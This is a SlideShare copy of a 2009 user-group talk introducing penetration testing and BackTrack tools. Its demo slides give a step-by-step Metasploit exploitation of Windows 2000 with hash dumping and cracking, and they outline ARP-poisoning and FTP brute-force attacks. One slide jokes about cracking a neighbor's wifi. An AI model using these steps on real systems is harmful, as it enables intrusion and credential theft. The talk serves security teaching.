SlideShare a Scribd company logo
Hack Attack!
An Introduction to Penetration Testing




    Steve Phillips (aka fraktil)
     2009.12.17 @ SBLUG
Who Am I?
●   Attended UCSB 2004-2008
    –   Majored in Math and Philosophy, not CS
●   Started using Linux in 2001
    –   Mandrake, then Slackware, then Debian
●   Applying for penetration testing job in January
●   Biases/“Preferences”
    –   Linux > Windoze (duh)
    –   Python > Ruby
    –   Emacs > vi
    –   Debian (and variants) > others
Can Hacking Be Ethical?
                Or, what is Ethical Hacking?

●   Black Hat
    –   Compromises computer systems without permission
    –   Criminal
●   White Hat, aka Ethical Hacker
    –   Gets paid to hack – legally (friggin' sweet)
    –   Always gets permission before attacking a system
●   Gray Hat
    –   Some combination of Black and White
The Stages of Hackerdom
●   Script Kiddie (“skiddie”)
    –   Can only run automated tools
    –   Doesn't understand underlying technology
●   Advanced Beginner
    –   Mastered advanced features of many tools
    –   Knows enough programming to create own tools
         ●   C => Python, Ruby (see next slide)
●   Uberhacker
    –   Discovers new vulnerabilities (or new types of vulns)
    –   Knows Assembly, C, Python and/or Ruby, SQL
    –   Excellent programmer; writes tools, scripts regularly
    –   Can defend as well as attack (firewalls, IDS, etc)
Programming Languages Used to
     Create Hacking Tools
●   C
    –   Nmap (network mapper, portscanner, more)
    –   Nessus (vulnerability detection)
    –   Wireshark (network sniffer)
●   Python
    –   w3af (web app attack framework)
    –   sqlmap (automatic SQL injection)
    –   TheMiddler (session hijacking, targeted pw sniffing)
●   Ruby
    –   Metasploit (vuln exploitation, much more)
What About in Back|Track 4?
                    Overall: Tools + Exploits
●   File count: find /pentest | grep .c$ | wc -l
●   Line count: cat $(find /pentest | grep .c$) | wc -l

●   C:      4058 .c files             1,300,000 lines
●   Python: 2431 .py files              612,000 lines
●   Ruby: 5468 .rb files                694,000 lines
        ●   2773 files from Metasploit
        ●   1271 files from Dradis (information organizing, sharing)
        ●   1424 other
●   C++:        431 .cpp files              144,000 lines
What About in Back|Track 4?
                Exploits Only (from exploitdb)

●   C
    –   1321 .c files
●   Python
    –   405 .py files
●   Ruby
    –   146 .rb files
●   C++
    –   110 .cpp files
TIOBE Index
Programming Language Popularity
Back|Track 4 Categories
●   Information Gathering
    –   Email addresses, DNS
●   Network Mapping
●   Vulnerability Identification
●   Web Application Analysis
●   Radio Network Analysis
●   Penetration (not that kind)
Back|Track 4 Categories
●   Privilege Escalation
●   Maintaining Access
●   Digital Forensics
●   Reverse Engineering
●   VoIP (Voice over Internet Protocol)
●   Misc
DEMO: Sniffing Passwords
             with Ettercap
●   ARP Poisoning for MitM Attack
    –   Associate attacker's MAC with router's IP
    –   Target tries to route traffic through router
         ●   Routes it through attacker instead
    –   Attacker forwards traffic both ways
    –   Attacker can silently watch or inject traffic
         ●   TheMiddler, sslstrip
How Else Can We Get Creds?
●   Phishing
    –   Via email
●   Spear Phishing
    –   Becoming popular
    –   Very hard to stop
●   In-person Social Engineering
    –   Kevin Mitnick is famous for this
●   Brute force
DEMO: Bruteforcing FTP
●   Using Hydra to bruteforce weak FTP password
    –   Well, really a dictionary attack
DEMO: Pwning Win2k
●   Create database (or connect to existing)
    –   db_create [optional_database_name]
●   Find win2k box using nmap (in metasploit)
    –   db_nmap -sV -p 135,139,445 xxx.xxx.xxx.0/24
●   Search Metasploit for win2k exploits
    –   search 2000
●   Use exploit w/meterpreter
    –   use exploit/windows/smb/ms05_039_pnp
    –   set PAYLOAD windows/meterpreter/bind_tcp
●   Which parameters still need to be set?
    –   show options
DEMO: Pwning Win2k
●   Set parameters
    –   set RHOST [target_ip]
●   Now we exploit! Can you guess the command?
    –   exploit
●   Get hashes
    –   hashdump
    –   This would be much harder without meterpreter!
●   Copy and paste hashes into new text file
●   Crack hashes with john the ripper
    –   ./john [file_containing_hashes].txt
●   Game Over
Why Become an Ethical Hacker?
●   Field is growing (see next slide)
    –   New laws, regulations
    –   US government falling behind in cyber security

●   You get paid to hack – need I say more?
    –   Banks
    –   Telecoms
    –   Casinos
    –   Foreign countries (for the federal gov't)
Hack Attack! An Introduction to Penetration Testing
How Can I Practice Legally?
●   Virtualization (VMware, VirtualBox)
    –   Use virtual images from recent CTF competitions
         ●   http://lampsecurity.org/capture-the-flag-6
         ●   http://ctf.hcesperer.org/25c3ctf
         ●   http://ctf.hcesperer.org/daopen08
         ●   http://ctf.hcesperer.org/eh08ctf
●   NetWars
    –   Part of government's Cyber Defense Initiative 2009
●   DVL: Damn Vulnerable Linux
    –   Purposely misconfigured, exploitable
    –   http://tinyurl.com/dvllinux15
Further Resources
                           Learning

●   Metasploit
    –   Online Class: http://www.offensive-
        security.com/metasploit-unleashed/
●   Nmap Guide
    –   http://nmap.org/book/man.html
●   Security Videos, Tutorials
    –   http://securitytube.net
Tools Added to Back|Track
                  Extra Tools I Used

●   Metasploit 3.3.2 (updated)
●   Nmap 5.0 (updated)

●   Exploitdb archive (/pentest/exploits/exlpoitdb)
Summary
●   Hacking can be ethical
●   “Computer security” is an oxymoron
    –   No one is safe
●   REALLY powerful hacking tools exist
●   Metasploit is effing dangerous
Future Demos?
●   More local fun
    –   Crack neighbor's wifi (WEP)
    –   Exploit remote vuln in DD-WRT firmware
    –   Redirecting traffic using fake DNS server
    –   Intercepting Twitter, Facebook, LinkedIn creds
●   More like real pen testing
    –   SQL injection
    –   XSS
    –   Nessus scan
Contact Information
●   Name:       Steve Phillips
●   New Blog:   SweetHack.blogspot.com
●   Email:      fraktil@gmail.com
●   Twitter:    twitter.com/fraktil
●   LinkedIn:   linkedin.com/in/sdphillips
●   IRC:        fraktil in #sblug on borg-cube.com
Questions?

More Related Content

PPTX
Kali Linux
PPTX
Kali presentation
PDF
Tools kali
PDF
penetration test using Kali linux ppt
ODP
Kali linux and some features [view in Full screen mode]
PPTX
Kali Linux - Falconer
PPTX
2016 TTL Security Gap Analysis with Kali Linux
PPTX
Linux/Unix Night - (PEN) Testing Toolkits (English)
Kali Linux
Kali presentation
Tools kali
penetration test using Kali linux ppt
Kali linux and some features [view in Full screen mode]
Kali Linux - Falconer
2016 TTL Security Gap Analysis with Kali Linux
Linux/Unix Night - (PEN) Testing Toolkits (English)

What's hot (20)

PDF
Web Application Security Testing: Kali Linux Is the Way to Go
PDF
(03 2013) guide to kali linux
PPTX
Kali Linux
PPTX
kali linux.pptx
PPTX
Kali Linux - Falconer - ISS 2014
PPTX
Kali linux
PPTX
Kali Linux
PPTX
Kali linux
PPTX
Kali linux
PPTX
Shamsa altayer 10bg kali linux
PPTX
Kali Linux - CleveSec 2015
PPTX
kali linux
PPTX
Kali linux
PPTX
Sticky Keys to the Kingdom
PDF
BASIC OVERVIEW OF KALI LINUX
PDF
Kali tools list with short description
PDF
Learn Ethical Hacking With Kali Linux | Ethical Hacking Tutorial | Kali Linux...
PDF
Parrot Security OS | Introduction to Parrot Security OS | Cybersecurity Train...
PDF
Anatomy of a Cloud Hack
PPTX
External to DA, the OS X Way
Web Application Security Testing: Kali Linux Is the Way to Go
(03 2013) guide to kali linux
Kali Linux
kali linux.pptx
Kali Linux - Falconer - ISS 2014
Kali linux
Kali Linux
Kali linux
Kali linux
Shamsa altayer 10bg kali linux
Kali Linux - CleveSec 2015
kali linux
Kali linux
Sticky Keys to the Kingdom
BASIC OVERVIEW OF KALI LINUX
Kali tools list with short description
Learn Ethical Hacking With Kali Linux | Ethical Hacking Tutorial | Kali Linux...
Parrot Security OS | Introduction to Parrot Security OS | Cybersecurity Train...
Anatomy of a Cloud Hack
External to DA, the OS X Way

Similar to Hack Attack! An Introduction to Penetration Testing (20)

PDF
Intrusion Techniques
PDF
Hacking school computers for fun profit and better grades short
PPT
Security & ethical hacking
PDF
Penetration Testing is the Art of the Manipulation
PDF
ethical Hack
PDF
PDF
PPS
Workshop on BackTrack live CD
PPT
Kunal - Introduction to backtrack - ClubHack2008
PPT
Kunal - Introduction to BackTrack - ClubHack2008
PPT
Sembang2 Keselamatan It 2004
PDF
Hack the book Mini
PPTX
Ethical hacking
PPT
Security & ethical hacking p2
PPTX
Finalppt metasploit
PDF
Hacking
PPTX
Ethical Hacking Redefined
PPTX
Ethical Hacking
PDF
SOHOpelessly Broken
PPTX
Final project.ppt
Intrusion Techniques
Hacking school computers for fun profit and better grades short
Security & ethical hacking
Penetration Testing is the Art of the Manipulation
ethical Hack
Workshop on BackTrack live CD
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
Sembang2 Keselamatan It 2004
Hack the book Mini
Ethical hacking
Security & ethical hacking p2
Finalppt metasploit
Hacking
Ethical Hacking Redefined
Ethical Hacking
SOHOpelessly Broken
Final project.ppt

Recently uploaded (20)

PDF
Network Security Unit 5.pdf for BCA BBA.
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
PPTX
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
PDF
GamePlan Trading System Review: Professional Trader's Honest Take
PDF
solutions_manual_-_materials___processing_in_manufacturing__demargo_.pdf
PDF
CIFDAQ's Market Insight: SEC Turns Pro Crypto
PDF
[발표본] 너의 과제는 클라우드에 있어_KTDS_김동현_20250524.pdf
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
PDF
cuic standard and advanced reporting.pdf
PDF
Electronic commerce courselecture one. Pdf
PDF
Shreyas Phanse Resume: Experienced Backend Engineer | Java • Spring Boot • Ka...
PPT
“AI and Expert System Decision Support & Business Intelligence Systems”
PDF
KodekX | Application Modernization Development
PDF
Modernizing your data center with Dell and AMD
PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
PDF
Advanced IT Governance
PPTX
Big Data Technologies - Introduction.pptx
Network Security Unit 5.pdf for BCA BBA.
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
GamePlan Trading System Review: Professional Trader's Honest Take
solutions_manual_-_materials___processing_in_manufacturing__demargo_.pdf
CIFDAQ's Market Insight: SEC Turns Pro Crypto
[발표본] 너의 과제는 클라우드에 있어_KTDS_김동현_20250524.pdf
The Rise and Fall of 3GPP – Time for a Sabbatical?
Per capita expenditure prediction using model stacking based on satellite ima...
cuic standard and advanced reporting.pdf
Electronic commerce courselecture one. Pdf
Shreyas Phanse Resume: Experienced Backend Engineer | Java • Spring Boot • Ka...
“AI and Expert System Decision Support & Business Intelligence Systems”
KodekX | Application Modernization Development
Modernizing your data center with Dell and AMD
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
Advanced IT Governance
Big Data Technologies - Introduction.pptx

Hack Attack! An Introduction to Penetration Testing

  • 1. Hack Attack! An Introduction to Penetration Testing Steve Phillips (aka fraktil) 2009.12.17 @ SBLUG
  • 2. Who Am I? ● Attended UCSB 2004-2008 – Majored in Math and Philosophy, not CS ● Started using Linux in 2001 – Mandrake, then Slackware, then Debian ● Applying for penetration testing job in January ● Biases/“Preferences” – Linux > Windoze (duh) – Python > Ruby – Emacs > vi – Debian (and variants) > others
  • 3. Can Hacking Be Ethical? Or, what is Ethical Hacking? ● Black Hat – Compromises computer systems without permission – Criminal ● White Hat, aka Ethical Hacker – Gets paid to hack – legally (friggin' sweet) – Always gets permission before attacking a system ● Gray Hat – Some combination of Black and White
  • 4. The Stages of Hackerdom ● Script Kiddie (“skiddie”) – Can only run automated tools – Doesn't understand underlying technology ● Advanced Beginner – Mastered advanced features of many tools – Knows enough programming to create own tools ● C => Python, Ruby (see next slide) ● Uberhacker – Discovers new vulnerabilities (or new types of vulns) – Knows Assembly, C, Python and/or Ruby, SQL – Excellent programmer; writes tools, scripts regularly – Can defend as well as attack (firewalls, IDS, etc)
  • 5. Programming Languages Used to Create Hacking Tools ● C – Nmap (network mapper, portscanner, more) – Nessus (vulnerability detection) – Wireshark (network sniffer) ● Python – w3af (web app attack framework) – sqlmap (automatic SQL injection) – TheMiddler (session hijacking, targeted pw sniffing) ● Ruby – Metasploit (vuln exploitation, much more)
  • 6. What About in Back|Track 4? Overall: Tools + Exploits ● File count: find /pentest | grep .c$ | wc -l ● Line count: cat $(find /pentest | grep .c$) | wc -l ● C: 4058 .c files 1,300,000 lines ● Python: 2431 .py files 612,000 lines ● Ruby: 5468 .rb files 694,000 lines ● 2773 files from Metasploit ● 1271 files from Dradis (information organizing, sharing) ● 1424 other ● C++: 431 .cpp files 144,000 lines
  • 7. What About in Back|Track 4? Exploits Only (from exploitdb) ● C – 1321 .c files ● Python – 405 .py files ● Ruby – 146 .rb files ● C++ – 110 .cpp files
  • 9. Back|Track 4 Categories ● Information Gathering – Email addresses, DNS ● Network Mapping ● Vulnerability Identification ● Web Application Analysis ● Radio Network Analysis ● Penetration (not that kind)
  • 10. Back|Track 4 Categories ● Privilege Escalation ● Maintaining Access ● Digital Forensics ● Reverse Engineering ● VoIP (Voice over Internet Protocol) ● Misc
  • 11. DEMO: Sniffing Passwords with Ettercap ● ARP Poisoning for MitM Attack – Associate attacker's MAC with router's IP – Target tries to route traffic through router ● Routes it through attacker instead – Attacker forwards traffic both ways – Attacker can silently watch or inject traffic ● TheMiddler, sslstrip
  • 12. How Else Can We Get Creds? ● Phishing – Via email ● Spear Phishing – Becoming popular – Very hard to stop ● In-person Social Engineering – Kevin Mitnick is famous for this ● Brute force
  • 13. DEMO: Bruteforcing FTP ● Using Hydra to bruteforce weak FTP password – Well, really a dictionary attack
  • 14. DEMO: Pwning Win2k ● Create database (or connect to existing) – db_create [optional_database_name] ● Find win2k box using nmap (in metasploit) – db_nmap -sV -p 135,139,445 xxx.xxx.xxx.0/24 ● Search Metasploit for win2k exploits – search 2000 ● Use exploit w/meterpreter – use exploit/windows/smb/ms05_039_pnp – set PAYLOAD windows/meterpreter/bind_tcp ● Which parameters still need to be set? – show options
  • 15. DEMO: Pwning Win2k ● Set parameters – set RHOST [target_ip] ● Now we exploit! Can you guess the command? – exploit ● Get hashes – hashdump – This would be much harder without meterpreter! ● Copy and paste hashes into new text file ● Crack hashes with john the ripper – ./john [file_containing_hashes].txt ● Game Over
  • 16. Why Become an Ethical Hacker? ● Field is growing (see next slide) – New laws, regulations – US government falling behind in cyber security ● You get paid to hack – need I say more? – Banks – Telecoms – Casinos – Foreign countries (for the federal gov't)
  • 18. How Can I Practice Legally? ● Virtualization (VMware, VirtualBox) – Use virtual images from recent CTF competitions ● http://lampsecurity.org/capture-the-flag-6 ● http://ctf.hcesperer.org/25c3ctf ● http://ctf.hcesperer.org/daopen08 ● http://ctf.hcesperer.org/eh08ctf ● NetWars – Part of government's Cyber Defense Initiative 2009 ● DVL: Damn Vulnerable Linux – Purposely misconfigured, exploitable – http://tinyurl.com/dvllinux15
  • 19. Further Resources Learning ● Metasploit – Online Class: http://www.offensive- security.com/metasploit-unleashed/ ● Nmap Guide – http://nmap.org/book/man.html ● Security Videos, Tutorials – http://securitytube.net
  • 20. Tools Added to Back|Track Extra Tools I Used ● Metasploit 3.3.2 (updated) ● Nmap 5.0 (updated) ● Exploitdb archive (/pentest/exploits/exlpoitdb)
  • 21. Summary ● Hacking can be ethical ● “Computer security” is an oxymoron – No one is safe ● REALLY powerful hacking tools exist ● Metasploit is effing dangerous
  • 22. Future Demos? ● More local fun – Crack neighbor's wifi (WEP) – Exploit remote vuln in DD-WRT firmware – Redirecting traffic using fake DNS server – Intercepting Twitter, Facebook, LinkedIn creds ● More like real pen testing – SQL injection – XSS – Nessus scan
  • 23. Contact Information ● Name: Steve Phillips ● New Blog: SweetHack.blogspot.com ● Email: [email protected] ● Twitter: twitter.com/fraktil ● LinkedIn: linkedin.com/in/sdphillips ● IRC: fraktil in #sblug on borg-cube.com